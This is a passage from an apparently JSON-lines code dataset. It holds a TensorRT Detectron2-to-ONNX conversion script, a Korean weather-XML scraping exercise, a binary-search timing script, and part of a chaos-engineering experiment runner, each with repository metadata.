bbox_pred.outputs[0], bbox_pred_shape)\n\n # 0.1, 0.1, 0.2, 0.2 are localization head variance numbers, they scale bbox_pred_reshape, in order to get accurate coordinates.\n scale_adj = np.expand_dims(np.asarray([0.1, 0.1, 0.2, 0.2], dtype=np.float32), axis=(0, 1))\n final_bbox_pred = self.graph.op_with_const(\"Mul\", \"bbox_pred/scale\", bbox_pred_reshape[0], scale_adj)\n\n # Reshape node that prepares cls_score for slicing and second NMS.\n cls_score_shape = np.array([self.batch_size, self.first_NMS_max_proposals, self.num_classes+1], dtype=np.int64)\n cls_score_reshape = self.graph.op_with_const(\"Reshape\", \"cls_score/reshape\", cls_score.outputs[0], cls_score_shape)\n\n # Slice operation to adjust third dimension of cls_score tensor, deletion of background class (81 in Detectron 2).\n final_cls_score = self.graph.slice(\"cls_score/slicer\", cls_score_reshape[0], 0, self.num_classes, 2)\n\n # Create NMS node.\n nms_outputs = self.NMS(final_bbox_pred[0], final_cls_score[0], matmul_out[0], -1, False, self.second_NMS_max_proposals, self.second_NMS_iou_threshold, self.second_NMS_score_threshold, second_nms_threshold, 'box_outputs')\n\n # Create ROIAlign node.\n mask_pooler_output = self.ROIAlign(nms_outputs[1], p2, p3, p4, p5, self.second_ROIAlign_pooled_size, self.second_ROIAlign_sampling_ratio, self.second_ROIAlign_type, self.second_NMS_max_proposals, 'mask_pooler')\n\n # Reshape mask pooler output.\n mask_pooler_shape = np.asarray([self.second_NMS_max_proposals*self.batch_size, self.fpn_out_channels, self.second_ROIAlign_pooled_size, self.second_ROIAlign_pooled_size], dtype=np.int64)\n mask_pooler_reshape_node = self.graph.op_with_const(\"Reshape\", \"mask_pooler/reshape\", mask_pooler_output, mask_pooler_shape)\n\n # Get first Conv op in mask head and connect ROIAlign's squeezed output to it.\n mask_head_conv = self.graph.find_node_by_op_name(\"Conv\", \"/roi_heads/mask_head/mask_fcn1/Conv\")\n mask_head_conv.inputs[0] = mask_pooler_reshape_node[0]\n\n # Reshape node that is preparing 2nd NMS class outputs for Add node that comes next.\n classes_reshape_shape = np.asarray([self.second_NMS_max_proposals*self.batch_size], dtype=np.int64)\n classes_reshape_node = self.graph.op_with_const(\"Reshape\", \"box_outputs/reshape_classes\", nms_outputs[3], classes_reshape_shape)\n\n # This loop will generate an array used in Add node, which eventually will help Gather node to pick the single\n # class of interest per bounding box, instead of creating 80 masks for every single bounding box.\n add_array = []\n for i in range(self.second_NMS_max_proposals*self.batch_size):\n if i == 0:\n start_pos = 0\n else:\n start_pos = i * self.num_classes\n add_array.append(start_pos)\n\n # This Add node is one of the Gather node inputs, Gather node performs gather on 0th axis of data tensor\n # and requires indices that set tensors to be withing bounds, this Add node provides the bounds for Gather.\n add_array = np.asarray(add_array, dtype=np.int32)\n classes_add_node = self.graph.op_with_const(\"Add\", \"box_outputs/add\", classes_reshape_node[0], add_array)\n\n # Get the last Conv op in mask head and reshape it to correctly gather class of interest's masks.\n last_conv = self.graph.find_node_by_op_name(\"Conv\", \"/roi_heads/mask_head/predictor/Conv\")\n last_conv_reshape_shape = np.asarray([self.second_NMS_max_proposals*self.num_classes*self.batch_size, self.mask_out_res, self.mask_out_res], dtype=np.int64)\n last_conv_reshape_node = self.graph.op_with_const(\"Reshape\", \"mask_head/reshape_all_masks\", last_conv.outputs[0], last_conv_reshape_shape)\n\n # Gather node that selects only masks belonging to detected class, 79 other masks are discarded.\n final_gather = self.graph.gather(\"mask_head/final_gather\", last_conv_reshape_node[0], classes_add_node[0], 0)\n\n # Get last Sigmoid node and connect Gather node to it.\n mask_head_sigmoid = self.graph.find_node_by_op_name(\"Sigmoid\", \"/roi_heads/mask_head/Sigmoid\")\n mask_head_sigmoid.inputs[0] = final_gather[0]\n\n # Final Reshape node, reshapes output of Sigmoid, important for various batch_size support (not tested yet).\n final_graph_reshape_shape = np.asarray([self.batch_size, self.second_NMS_max_proposals, self.mask_out_res, self.mask_out_res], dtype=np.int64)\n final_graph_reshape_node = self.graph.op_with_const(\"Reshape\", \"mask_head/final_reshape\", mask_head_sigmoid.outputs[0], final_graph_reshape_shape)\n final_graph_reshape_node[0].dtype = np.float32\n final_graph_reshape_node[0].name = \"detection_masks\"\n\n return nms_outputs, final_graph_reshape_node[0]\n\n # Only Detectron 2's Mask-RCNN R50-FPN 3x is supported currently.\n p2, p3, p4, p5 = backbone()\n rpn_outputs = proposal_generator(anchors, first_nms_threshold)\n box_head_outputs, mask_head_output = roi_heads(rpn_outputs, p2, p3, p4, p5, second_nms_threshold)\n # Append segmentation head output.\n box_head_outputs.append(mask_head_output)\n # Set graph outputs, both bbox and segmentation heads.\n self.graph.outputs = box_head_outputs\n self.sanitize()\n\n\ndef main(args):\n det2_gs = DET2GraphSurgeon(args.exported_onnx, args.det2_config, args.det2_weights)\n det2_gs.update_preprocessor(args.batch_size)\n anchors = det2_gs.get_anchors(args.sample_image)\n det2_gs.process_graph(anchors, args.first_nms_threshold, args.second_nms_threshold)\n det2_gs.save(args.onnx)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--exported_onnx\", help=\"The exported to ONNX Detectron 2 Mask R-CNN\", type=str)\n parser.add_argument(\"-o\", \"--onnx\", help=\"The output ONNX model file to write\", type=str)\n parser.add_argument(\"-c\", \"--det2_config\", help=\"The Detectron 2 config file (.yaml) for the model\", type=str)\n parser.add_argument(\"-w\", \"--det2_weights\", help=\"The Detectron 2 model weights (.pkl)\", type=str)\n parser.add_argument(\"-s\", \"--sample_image\", help=\"Sample image for anchors generation\", type=str)\n parser.add_argument(\"-b\", \"--batch_size\", help=\"Batch size for the model\", type=int, default=1)\n parser.add_argument(\"-t1\", \"--first_nms_threshold\", help=\"Override the score threshold for the 1st NMS operation\", type=float)\n parser.add_argument(\"-t2\", \"--second_nms_threshold\", help=\"Override the score threshold for the 2nd NMS operation\", type=float)\n args = parser.parse_args()\n if not all([args.exported_onnx, args.onnx, args.det2_config, args.det2_weights, args.sample_image]):\n parser.print_help()\n print(\"\\nThese arguments are required: --exported_onnx --onnx --det2_config --det2_weights and --sample_image\")\n sys.exit(1)\n main(args)\n", "repo_name": "NVIDIA/TensorRT", "sub_path": "samples/python/detectron2/create_onnx.py", "file_name": "create_onnx.py", "file_ext": "py", "file_size_in_byte": 31433, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8187, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.exit", "line_number": 21, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 25, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 25, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 26, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 26, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 27, "usage_type": "call"}, {"api_name": "detectron2.config.get_cfg", "line_number": 44, "usage_type": "call"}, {"api_name": "onnx_graphsurgeon.import_onnx", "line_number": 51, "usage_type": "call"}, {"api_name": "onnx.load", "line_number": 51, "usage_type": "call"}, {"api_name": "onnx_graphsurgeon.export_onnx", "line_number": 110, "usage_type": "call"}, {"api_name": "onnx.shape_inference.infer_shapes", "line_number": 111, "usage_type": "call"}, {"api_name": "onnx.shape_inference", "line_number": 111, "usage_type": "name"}, {"api_name": "onnx_graphsurgeon.import_onnx", "line_number": 112, "usage_type": "call"}, {"api_name": "detectron2.engine.defaults.DefaultPredictor", "line_number": 140, "usage_type": "call"}, {"api_name": "detectron2.modeling.build_model", "line_number": 141, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 144, "usage_type": "call"}, {"api_name": "torch.as_tensor", "line_number": 147, "usage_type": "call"}, {"api_name": "detectron2.structures.ImageList.from_tensors", "line_number": 153, "usage_type": "call"}, {"api_name": "detectron2.structures.ImageList", "line_number": 153, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 168, "usage_type": "call"}, {"api_name": "onnx_graphsurgeon.export_onnx", "line_number": 178, "usage_type": "call"}, {"api_name": "os.path.realpath", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path", "line_number": 179, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 180, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 180, "usage_type": "call"}, {"api_name": "os.path", "line_number": 180, "usage_type": "attribute"}, {"api_name": "onnx.save", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 196, "usage_type": "attribute"}, {"api_name": "numpy.expand_dims", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 210, "usage_type": "attribute"}, {"api_name": "onnx_graphsurgeon.Constant", "line_number": 225, "usage_type": "attribute"}, {"api_name": "onnx_graphsurgeon.Variable", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 252, "usage_type": "attribute"}, {"api_name": "onnx_graphsurgeon.Variable", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 253, "usage_type": "attribute"}, {"api_name": "onnx_graphsurgeon.Variable", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 255, "usage_type": "attribute"}, {"api_name": "onnx_graphsurgeon.Variable", "line_number": 257, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 257, "usage_type": "attribute"}, {"api_name": "onnx_graphsurgeon.Variable", "line_number": 304, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 304, "usage_type": "attribute"}, {"api_name": "numpy.matmul", "line_number": 382, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 384, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 385, "usage_type": "attribute"}, {"api_name": "onnx_graphsurgeon.Constant", "line_number": 386, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 411, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 411, "usage_type": "attribute"}, {"api_name": "numpy.matrix", "line_number": 425, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 425, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 429, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 429, "usage_type": "attribute"}, {"api_name": "numpy.expand_dims", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 433, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 437, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 437, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 450, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 450, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 458, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 458, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 473, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 473, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 478, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 478, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 489, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 489, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 491, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 516, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 529, "usage_type": "call"}]}
+{"seq_id": "17786539515", "text": "# 기상청 날씨 정보 SCraping\n# http://www.kma.go.kr/XML/weather/sfc_web_map.xml\n\nimport urllib.request\nimport xml.etree.ElementTree as et\n'''\n순서 1) urlopen 해주기\n순서 2) read로 2진 데이터로 읽기.\n순서 3) decode로 언어 형식 맞춰주기\n순서 4) 저장.\n'''\n\n\ntry:\n webdata = urllib.request.urlopen(\"http://www.kma.go.kr/XML/weather/sfc_web_map.xml\")\n# print(webdata)\n webxml = webdata.read()\n print(webxml) # 2진 데이타로 읽는다.\n \n webxml = webxml.strip().decode('utf-8')\n print(webxml) #decode로 풀어준다.\n webdata.close()\n \n with open('ftest.xml', mode = 'w', encoding='utf-8') as f:\n f.write(webxml)\n \nexcept Exception as e:\n print('err: ', e)\n \nprint('읽기 성공')\n\nxmlfile = et.parse('ftest.xml')\nroot = xmlfile.getroot()\nprint(root.tag)\nprint(root[0].tag)\n\nprint(root[0][0].attrib)\nprint(root[0][0].attrib.values())\n\nchildren = root.findall(\"{current}weather\")\nprint(children)\n\nfor i in children:\n y = i.get('year')\n m = i.get('month')\n d = i.get('day')\n h = i.get('hour')\n print(str(y) + '년' + str(m) + '월' + str(d) + '일' + str(h) + '시 현재')\n\ndatas=[]\nfor child in root:\n# print(child.tag)\n for i in child:\n# print(i.tag)\n local_name = i.text\n re_ta = (i.get('ta'))\n re_desc = (i.get('desc'))\n datas += [[local_name, re_ta, re_desc]]\n print(local_name + \", 온도:\" + str(re_ta) + \" \" + re_desc)\n \nprint(len(datas))\nprint()\n# 웹 이미지 읽기\n# https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png\nurl = \"https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png\"\nsave_name = \"test1.png\"\n\n# 다운로드 방법1.\nurllib.request.urlretrieve(url, save_name) # 다운로드 후 바로 저장함.\nprint('다운로드 후 저장 성공')\n\n# 다운로드 방법2. \nsava_name = \"test2.png\"\nimsi = urllib.request.urlopen(url).read() #메모리(램)으로 올린 후 저장한다,\n\nwith open(save_name, mode='wb') as f:\n f.write(imsi)\n print('저장완료!')\n\n\n\n\n\n \n \n \n ", "repo_name": "chul5775/python_study", "sub_path": "ex5_Web/scrap2_weather.py", "file_name": "scrap2_weather.py", "file_ext": "py", "file_size_in_byte": 2131, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "urllib.request.request.urlopen", "line_number": 15, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 15, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 15, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 32, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 32, "usage_type": "name"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 69, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 69, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 69, "usage_type": "name"}, {"api_name": "urllib.request.request.urlopen", "line_number": 74, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 74, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 74, "usage_type": "name"}]}
+{"seq_id": "5621762384", "text": "import random\nimport time\nimport functools\nx = [random.randint(1,1000000) for i in range(1000000)]\nx.sort()\n#print(x)\ndef timer(func):\n functools.wraps(func)\n def wr(*a):\n start = time.time()\n rv = func(*a)\n end = time.time()\n #print('elapsed: ',end-start)\n return rv\n return wr\n\n#@timer\ndef findThis(x,n):\n# print('-----------------------------------------------------------------------------------------')\n l = len(x)\n if l == 0:\n# print('N not found in the list')\n return False\n if l==1:\n if x[0] != n:\n# print('N not found in the list')\n return False\n else:\n# print('Found N')\n return True\n mid = x[l//2]\n# print('mid = : ',mid,'x[{}]'.format(l//2))\n if mid == n:\n# print('find :',n)\n return True\n if mid < n:\n# print('mid < n ,original x = :',x)\n# print('l =:', l//2)\n x = x[l//2:] #slice original list x . leave the half part that includes n.\n# print('new x =: ',x) \n return findThis(x,n)\n if mid > n:\n# print('mid >n, original x = :',x) \n# print('l =:', l//2) \n x = x[:l//2] #slice original list x . leave the half part that includes n.\n# print('new x = :',x)\n return findThis(x,n)\nstart = time.time()\nprint(findThis(x,25))\nend = time.time()\nprint(end - start)\nprint('+++++++++++++++++++++++++++++++')\n\n#@timer\ndef bSearch(x,n,low,high):\n if low > high:\n return False\n else:\n mid = (low+high)//2\n if n == x[mid]:\n return True\n elif n < x[mid]:\n return bSearch(x,n,low,mid-1)\n else:\n return bSearch(x,n,mid+1,high)\nstart = time.time() \nprint(bSearch(x,25,0,len(x)))\nend = time.time()\nprint(end - start)\n", "repo_name": "opnsesame/Data-Structures-and-Algorithms-Exercises", "sub_path": "test/BinarySearch.py", "file_name": "BinarySearch.py", "file_ext": "py", "file_size_in_byte": 1841, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.randint", "line_number": 4, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 8, "usage_type": "call"}, {"api_name": "time.time", "line_number": 10, "usage_type": "call"}, {"api_name": "time.time", "line_number": 12, "usage_type": "call"}, {"api_name": "time.time", "line_number": 48, "usage_type": "call"}, {"api_name": "time.time", "line_number": 50, "usage_type": "call"}, {"api_name": "time.time", "line_number": 66, "usage_type": "call"}, {"api_name": "time.time", "line_number": 68, "usage_type": "call"}]}
+{"seq_id": "40412514189", "text": "from abc import ABCMeta\nfrom concurrent.futures import Future, ThreadPoolExecutor, TimeoutError\n\ntry:\n import ctypes\n\n HAS_CTYPES = True\nexcept ImportError:\n HAS_CTYPES = False\nimport platform\nimport threading\nimport time\nfrom datetime import datetime\nfrom typing import Any, Dict, List, Optional\n\nfrom logzero import logger\n\nfrom chaoslib import __version__, substitute\nfrom chaoslib.activity import run_activities\nfrom chaoslib.configuration import load_configuration, load_dynamic_configuration\nfrom chaoslib.control import (\n Control,\n cleanup_controls,\n cleanup_global_controls,\n controls,\n initialize_controls,\n initialize_global_controls,\n)\nfrom chaoslib.exceptions import (\n ChaosException,\n ExperimentExitedException,\n InterruptExecution,\n)\nfrom chaoslib.exit import exit_signals\nfrom chaoslib.hypothesis import run_steady_state_hypothesis\nfrom chaoslib.rollback import run_rollbacks\nfrom chaoslib.secret import load_secrets\nfrom chaoslib.settings import get_loaded_settings\nfrom chaoslib.types import (\n Activity,\n Configuration,\n Dry,\n Experiment,\n Journal,\n Run,\n Schedule,\n Secrets,\n Settings,\n Strategy,\n)\n\n__all__ = [\"Runner\", \"RunEventHandler\"]\n\n\nclass RunEventHandler(metaclass=ABCMeta):\n \"\"\"\n Base class to react to certain, or all, events during an execution.\n\n This is mainly meant for reacting the execution's mainloop. Do not\n implement it as part of an extension, use the Control interface instead.\n \"\"\"\n\n def started(self, experiment: Experiment, journal: Journal) -> None:\n pass\n\n def running(\n self,\n experiment: Experiment,\n journal: Journal,\n configuration: Configuration,\n secrets: Secrets,\n schedule: Schedule,\n settings: Settings,\n ) -> None:\n pass\n\n def finish(self, journal: Journal) -> None:\n pass\n\n def interrupted(self, experiment: Experiment, journal: Journal) -> None:\n pass\n\n def signal_exit(self) -> None:\n pass\n\n def start_continuous_hypothesis(self, frequency: int) -> None:\n pass\n\n def continuous_hypothesis_iteration(self, iteration_index: int, state: Any) -> None:\n pass\n\n def continuous_hypothesis_completed(\n self, experiment: Experiment, journal: Journal, exception: Exception = None\n ) -> None:\n pass\n\n def start_hypothesis_before(self, experiment: Experiment) -> None:\n pass\n\n def hypothesis_before_completed(\n self, experiment: Experiment, state: Dict[str, Any], journal: Journal\n ) -> None:\n pass\n\n def start_hypothesis_after(self, experiment: Experiment) -> None:\n pass\n\n def hypothesis_after_completed(\n self, experiment: Experiment, state: Dict[str, Any], journal: Journal\n ) -> None:\n pass\n\n def start_method(self, experiment: Experiment) -> None:\n pass\n\n def method_completed(self, experiment: Experiment, state: Any) -> None:\n pass\n\n def start_rollbacks(self, experiment: Experiment) -> None:\n pass\n\n def rollbacks_completed(self, experiment: Experiment, journal: Journal) -> None:\n pass\n\n def start_cooldown(self, duration: int) -> None:\n pass\n\n def cooldown_completed(self) -> None:\n pass\n\n def start_activity(self, activity: Activity) -> None:\n pass\n\n def activity_completed(self, activity: Activity, run: Run) -> None:\n pass\n\n\nclass EventHandlerRegistry:\n def __init__(self):\n self.handlers = []\n\n def register(self, handler: RunEventHandler) -> None:\n self.handlers.append(handler)\n\n def started(self, experiment: Experiment, journal: Journal) -> None:\n for h in self.handlers:\n try:\n h.started(experiment, journal)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def running(\n self,\n experiment: Experiment,\n journal: Journal,\n configuration: Configuration,\n secrets: Secrets,\n schedule: Schedule,\n settings: Settings,\n ) -> None:\n for h in self.handlers:\n try:\n h.running(\n experiment, journal, configuration, secrets, schedule, settings\n )\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def finish(self, journal: Journal) -> None:\n for h in self.handlers:\n try:\n h.finish(journal)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def interrupted(self, experiment: Experiment, journal: Journal) -> None:\n for h in self.handlers:\n try:\n h.interrupted(experiment, journal)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def signal_exit(self) -> None:\n for h in self.handlers:\n try:\n h.signal_exit()\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def start_continuous_hypothesis(self, frequency: int) -> None:\n for h in self.handlers:\n try:\n h.start_continuous_hypothesis(frequency)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def continuous_hypothesis_iteration(self, iteration_index: int, state: Any) -> None:\n for h in self.handlers:\n try:\n h.continuous_hypothesis_iteration(iteration_index, state)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def continuous_hypothesis_completed(\n self, experiment: Experiment, journal: Journal, exception: Exception = None\n ) -> None:\n for h in self.handlers:\n try:\n h.continuous_hypothesis_completed(experiment, journal, exception)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def start_hypothesis_before(self, experiment: Experiment) -> None:\n for h in self.handlers:\n try:\n h.start_hypothesis_before(experiment)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def hypothesis_before_completed(\n self, experiment: Experiment, state: Dict[str, Any], journal: Journal\n ) -> None:\n for h in self.handlers:\n try:\n h.hypothesis_before_completed(experiment, state, journal)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def start_hypothesis_after(self, experiment: Experiment) -> None:\n for h in self.handlers:\n try:\n h.start_hypothesis_after(experiment)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def hypothesis_after_completed(\n self, experiment: Experiment, state: Dict[str, Any], journal: Journal\n ) -> None:\n for h in self.handlers:\n try:\n h.hypothesis_after_completed(experiment, state, journal)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def start_method(self, experiment: Experiment) -> None:\n for h in self.handlers:\n try:\n h.start_method(experiment)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def method_completed(self, experiment: Experiment, state: Any = None) -> None:\n for h in self.handlers:\n try:\n h.method_completed(experiment, state)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def start_rollbacks(self, experiment: Experiment) -> None:\n for h in self.handlers:\n try:\n h.start_rollbacks(experiment)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def rollbacks_completed(self, experiment: Experiment, journal: Journal) -> None:\n for h in self.handlers:\n try:\n h.rollbacks_completed(experiment, journal)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def start_cooldown(self, duration: int) -> None:\n for h in self.handlers:\n try:\n h.start_cooldown(duration)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def cooldown_completed(self) -> None:\n for h in self.handlers:\n try:\n h.cooldown_completed()\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def start_activity(self, activity: Activity) -> None:\n for h in self.handlers:\n try:\n h.start_activity(activity)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def activity_completed(self, activity: Activity, run: Run) -> None:\n for h in self.handlers:\n try:\n h.activity_completed(activity, run)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n\nclass Runner:\n def __init__(self, strategy: Strategy, schedule: Schedule = None):\n self.strategy = strategy\n self.schedule = schedule or Schedule()\n self.event_registry = EventHandlerRegistry()\n\n def __enter__(self) -> \"Runner\":\n return self\n\n def __exit__(self, exc_type: Any, exc_value: Any, tb: Any) -> None:\n self.cleanup()\n\n def register_event_handler(self, handler: RunEventHandler) -> None:\n self.event_registry.register(handler)\n\n def configure(\n self,\n experiment: Experiment,\n settings: Settings,\n experiment_vars: Dict[str, Any],\n ) -> None:\n config_vars, secret_vars = experiment_vars or (None, None)\n self.settings = settings if settings is not None else get_loaded_settings()\n self.config = load_configuration(\n experiment.get(\"configuration\", {}), config_vars\n )\n self.secrets = load_secrets(\n experiment.get(\"secrets\", {}), self.config, secret_vars\n )\n self.config = load_dynamic_configuration(self.config, self.secrets)\n\n def cleanup(self):\n pass\n\n def run(\n self,\n experiment: Experiment,\n settings: Settings = None,\n experiment_vars: Dict[str, Any] = None,\n journal: Journal = None,\n ) -> Journal:\n self.configure(experiment, settings, experiment_vars)\n with exit_signals():\n journal = self._run(\n self.strategy,\n self.schedule,\n experiment,\n journal,\n self.config,\n self.secrets,\n self.settings,\n self.event_registry,\n )\n return journal\n\n def _run(\n self,\n strategy: Strategy,\n schedule: Schedule, # noqa: C901\n experiment: Experiment,\n journal: Journal,\n configuration: Configuration,\n secrets: Secrets,\n settings: Settings,\n event_registry: EventHandlerRegistry,\n ) -> None:\n experiment[\"title\"] = substitute(experiment[\"title\"], configuration, secrets)\n logger.info(\"Running experiment: {t}\".format(t=experiment[\"title\"]))\n\n started_at = time.time()\n journal = journal or initialize_run_journal(experiment)\n event_registry.started(experiment, journal)\n\n control = Control()\n activity_pool, rollback_pool = get_background_pools(experiment)\n hypo_pool = get_hypothesis_pool()\n continuous_hypo_event = threading.Event()\n\n dry = experiment.get(\"dry\", None)\n if dry and isinstance(dry, Dry):\n logger.warning(f\"Running experiment with dry {dry.value}\")\n initialize_global_controls(\n experiment, configuration, secrets, settings, event_registry=event_registry\n )\n initialize_controls(\n experiment, configuration, secrets, event_registry=event_registry\n )\n event_registry.running(\n experiment, journal, configuration, secrets, schedule, settings\n )\n\n if not strategy:\n strategy = Strategy.DEFAULT\n\n logger.info(f\"Steady-state strategy: {strategy.value}\")\n rollback_strategy = (\n settings.get(\"runtime\", {}).get(\"rollbacks\", {}).get(\"strategy\", \"default\")\n )\n logger.info(f\"Rollbacks strategy: {rollback_strategy}\")\n\n exit_gracefully_with_rollbacks = True\n\n with_ssh = False\n if strategy != Strategy.SKIP:\n with_ssh = has_steady_state_hypothesis_with_probes(experiment)\n if not with_ssh:\n logger.info(\n \"No steady state hypothesis defined. \" \"That's ok, just exploring.\"\n )\n else:\n logger.info(\"Skipping Steady-State Hypothesis as requested\")\n\n try:\n try:\n control.begin(\n \"experiment\", experiment, experiment, configuration, secrets\n )\n\n state = object()\n if with_ssh and should_run_before_method(strategy):\n state = run_gate_hypothesis(\n experiment, journal, configuration, secrets, event_registry, dry\n )\n\n if state is not None:\n if with_ssh and should_run_during_method(strategy):\n run_hypothesis_during_method(\n hypo_pool,\n continuous_hypo_event,\n strategy,\n schedule,\n experiment,\n journal,\n configuration,\n secrets,\n event_registry,\n dry,\n )\n\n state = run_method(\n strategy,\n activity_pool,\n experiment,\n journal,\n configuration,\n secrets,\n event_registry,\n dry,\n )\n\n continuous_hypo_event.set()\n if journal[\"status\"] not in [\"interrupted\", \"aborted\"]:\n if (\n with_ssh\n and (state is not None)\n and should_run_after_method(strategy)\n ):\n run_deviation_validation_hypothesis(\n experiment,\n journal,\n configuration,\n secrets,\n event_registry,\n dry,\n )\n except InterruptExecution as i:\n journal[\"status\"] = \"interrupted\"\n logger.fatal(str(i))\n event_registry.interrupted(experiment, journal)\n except KeyboardInterrupt:\n journal[\"status\"] = \"interrupted\"\n logger.warning(\"Received a termination signal (Ctrl-C)...\")\n event_registry.signal_exit()\n except SystemExit as x:\n journal[\"status\"] = \"interrupted\"\n logger.warning(f\"Received the exit signal: {x.code}\")\n\n exit_gracefully_with_rollbacks = x.code != 30\n if not exit_gracefully_with_rollbacks:\n logger.warning(\"Ignoring rollbacks as per signal\")\n event_registry.signal_exit()\n finally:\n hypo_pool.shutdown(wait=True)\n\n # just in case a signal overrode everything else to tell us not to\n # play them anyway (see the exit.py module)\n if exit_gracefully_with_rollbacks:\n run_rollback(\n rollback_strategy,\n rollback_pool,\n experiment,\n journal,\n configuration,\n secrets,\n event_registry,\n dry,\n )\n\n journal[\"end\"] = datetime.utcnow().isoformat()\n journal[\"duration\"] = time.time() - started_at\n\n # the spec only allows these statuses, so if it's anything else\n # we override to \"completed\"\n if journal[\"status\"] not in (\n \"completed\",\n \"failed\",\n \"aborted\",\n \"interrupted\",\n ):\n journal[\"status\"] = \"completed\"\n\n has_deviated = journal[\"deviated\"]\n status = \"deviated\" if has_deviated else journal[\"status\"]\n logger.info(f\"Experiment ended with status: {status}\")\n if has_deviated:\n logger.info(\n \"The steady-state has deviated, a weakness may have been \"\n \"discovered\"\n )\n\n control.with_state(journal)\n try:\n control.end(\n \"experiment\", experiment, experiment, configuration, secrets\n )\n except ChaosException:\n logger.debug(\"Failed to close controls\", exc_info=True)\n finally:\n try:\n cleanup_controls(experiment)\n cleanup_global_controls()\n finally:\n event_registry.finish(journal)\n\n return journal\n\n\ndef 